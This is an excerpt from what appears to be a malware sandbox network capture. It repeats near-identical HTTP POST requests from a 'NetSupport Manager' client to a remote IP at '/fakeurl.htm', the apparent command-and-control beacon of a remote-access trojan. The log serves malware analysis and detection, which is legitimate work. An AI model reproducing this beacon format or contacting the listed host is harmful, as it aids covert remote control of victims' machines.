                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.015103102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.115972042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.216931105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.318109035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.419044018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.519979000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.621829033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.722940922 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.823945999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:29.924024105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.024027109 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.125004053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.225090027 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.324990988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.425919056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.531060934 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.631934881 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.732002974 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.831944942 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:30.932041883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.032944918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.132977009 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.233935118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.333975077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.434937000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.534986973 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.634942055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.736144066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.835968971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:31.936916113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.036962032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.138096094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.238919020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.338977098 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.438920975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.539949894 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.641009092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.741921902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.842056990 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:32.941962004 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.043070078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.143795013 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.243980885 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.343946934 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.444032907 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.545098066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.644942999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.745951891 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.845973969 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:33.946949005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.046928883 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.147903919 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.248869896 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.349916935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.450934887 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.558865070 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.659929991 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.759977102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.860939026 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:34.961956024 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.062922001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.162909031 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.264184952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.364916086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.465178967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.565907001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:35.909297943 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.013761997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.112921000 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.315963030 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:36.421046972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
